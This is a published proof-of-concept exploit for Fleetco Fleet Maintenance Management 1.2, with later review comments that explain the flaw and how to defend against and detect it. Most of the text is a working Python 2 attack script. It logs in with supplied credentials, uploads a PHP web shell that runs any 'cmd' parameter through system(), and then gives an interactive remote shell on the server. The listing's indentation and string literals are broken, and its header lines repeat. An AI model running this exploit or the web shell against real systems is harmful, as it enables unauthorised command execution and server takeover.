# Exploit Title: Fleetco Fleet Maintenance Management 1.2 - Remote Code Execution
# Date: 2018-11-23
# Exploit Author: Özkan Mustafa Akkuş (AkkuS)
# Contact: https://pentest.com.tr
# Date: 2018-11-23
# Exploit Author: Özkan Mustafa Akkuş (AkkuS)
# Contact: https://pentest.com.tr
# Vendor Homepage: https://www.fleetco.space
# Software Link: http://www.fleetco.space/download/215/
# Version: v1.2
# Category: Webapps
# Tested on: XAMPP for Linux 1.7.2
# Software Description : Fleetco FMM is a free, web-based vehicle fleet maintenance management
# system written in PHP with a MySQL database backend.
# Description : Fleetco 1.2 and lower versions allow the upload of arbitrary ".php" files, which
# leads to remote command execution on the remote server. Any authorized user account is enough to exploit it.
# ==================================================================
# PoC:
#!/usr/bin/python
# NOTE(review): this is a Python 2 script (print statement, raw_input,
# cookielib) and will not run unmodified under Python 3. As rendered here,
# several string literals (the banner prints and rce_data) continue across
# line breaks and the if/while bodies carry no indentation -- presumably an
# extraction artifact of the original listing, not the author's formatting.
#
# Flow of the PoC: (1) log in with mechanize to obtain a session cookie,
# (2) POST a hand-built multipart "accident" record to accidents_add.php whose
# image part carries a .php file, (3) poll /files/RCE.php and relay commands.
#
# Defender's reading: the weak point is that accidents_add.php keeps the
# client-supplied filename and extension (filename="RCE.php") and stores the
# upload under a web-served path (/files/), where the PHP interpreter executes
# it. Any one of the following breaks the chain: a server-side extension/MIME
# allowlist for image uploads, server-generated storage names, storing uploads
# outside the web root, or disabling script execution in the upload directory.
# Detection: an authenticated POST to accidents_add.php carrying a multipart
# part with a .php filename, followed by GETs to files/*.php with a "cmd"
# query parameter.
import mechanize
import sys
import cookielib
import requests
import colorama
from colorama import Fore
print "
[*] Fleetco Fleet Maintenance Management v1.2 - Remote Code Execution"
print "[*] Vulnerability discovered by AkkuS"
print "[*] My Blog - https://www.pentest.com.tr
"
# Usage check: exactly one argument, the target host (no scheme, no port).
# Note that a usage error still exits with status 0, so a caller cannot tell
# misuse apart from a normal run.
if (len(sys.argv) != 2):
print "[*] Usage: poc.py <RHOST>"
exit(0)
rhost = sys.argv[1]
# User Information Input
# Credentials of an existing account: the upload endpoint is only reached
# after login, so this is a post-authentication issue.
UserName = str(raw_input("User Name: "))
Password = str(raw_input("Password: "))
# Login into site
print(Fore.BLUE + "+ [*] Loging in...")
br = mechanize.Browser()
br.set_handle_robots(False)
# Cookie Jar
# The jar is handed to requests.post() later, so the session cookie obtained
# by the mechanize login is reused for the upload request.
cj = cookielib.LWPCookieJar()
br.set_cookiejar(cj)
br.open("http://"+rhost+"/login.php")
# assert is stripped under -O; it only checks that the login page was HTML.
assert br.viewing_html()
# The second select_form() call replaces the first selection; presumably the
# login form is both named "form1" and the first form on the page -- verify.
br.select_form(name="form1")
br.select_form(nr=0)
br.form['username'] = UserName
br.form['password'] = Password
br.submit()
# Where are you
# Login success is not verified here; the post-submit page title is only
# echoed to the user.
title = br.title()
print (Fore.YELLOW + "+ [*] You're in "+title+" section of the app now")
# Create Accident Records with multipart/form-data to RCE
# The boundary in the Content-Type header must match the one used in every
# part of rce_data below (body boundaries carry two extra leading dashes).
# The body is a hand-built multipart form: ordinary record fields, plus the
# value_Images_1 part whose filename has a .php extension and a
# filename_Images_1 field that repeats that name. Nothing on this page
# suggests the server validates the extension or content type of that part.
rce_headers = {"Content-Type": "multipart/form-data; boundary=---------------------------10664657171782352435254769348"}
rce_data="-----------------------------10664657171782352435254769348
Content-Disposition: form-data; name="value_Fleet_1"
Cargo Carriers
-----------------------------10664657171782352435254769348
Content-Disposition: form-data; name="value_Vehicle_1"
BF1470
-----------------------------10664657171782352435254769348
Content-Disposition: form-data; name="value_Type_1"
Lorry
-----------------------------10664657171782352435254769348
Content-Disposition: form-data; name="value_Date_1"
11/07/2018
-----------------------------10664657171782352435254769348
Content-Disposition: form-data; name="type_Date_1"
date2
-----------------------------10664657171782352435254769348
Content-Disposition: form-data; name="type_Time_1"
time
-----------------------------10664657171782352435254769348
Content-Disposition: form-data; name="value_Driver_1"
Antony Croos
-----------------------------10664657171782352435254769348
Content-Disposition: form-data; name="value_Details_1"
test
-----------------------------10664657171782352435254769348
Content-Disposition: form-data; name="type_Images_1"
upload2
-----------------------------10664657171782352435254769348
Content-Disposition: form-data; name="value_Images_1"; filename="RCE.php"
Content-Type: application/x-php
<?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>
-----------------------------10664657171782352435254769348
Content-Disposition: form-data; name="filename_Images_1"
RCE.php
-----------------------------10664657171782352435254769348
Content-Disposition: form-data; name="value_EnteredBy_1"
Mark Croos
-----------------------------10664657171782352435254769348
Content-Disposition: form-data; name="value_SysDate_1"
2018-11-23 14:58:09
-----------------------------10664657171782352435254769348
Content-Disposition: form-data; name="id"
1
-----------------------------10664657171782352435254769348
Content-Disposition: form-data; name="a"
added
-----------------------------10664657171782352435254769348
Content-Disposition: form-data; name="rndVal"
0.8040138072331872
-----------------------------10664657171782352435254769348--
"
# The mechanize cookie jar authenticates the upload. An HTTP 200 is taken as
# success without inspecting the response body, so a rejected upload that
# still renders a page would be reported as a success here.
upload = requests.post("http://"+rhost+"/accidents_add.php?submit=1&", headers=rce_headers, cookies=cj, data=rce_data)
if upload.status_code == 200:
print (Fore.GREEN + "+ [*] Shell successfully uploaded!")
# Shell validation and exploit
# Each iteration re-requests the stored file from the web-served /files/
# directory -- this storage location is what makes the upload exploitable.
# A 200 means the file is present and served; the else branch (whose owning
# if is ambiguous in this rendering) reports failure and exits.
while True:
shellctrl = requests.get("http://"+rhost+"/files/RCE.php")
if shellctrl.status_code == 200:
Command = str(raw_input(Fore.WHITE + "shell> "))
URL = requests.get("http://"+rhost+"/files/RCE.php?cmd="+Command+"")
print URL.text
else:
print (Fore.RED + "+ [X] Unable to upload or access the shell")
sys.exit()
Fleetco Fleet Maintenance Management 1.2 Remote Code Execution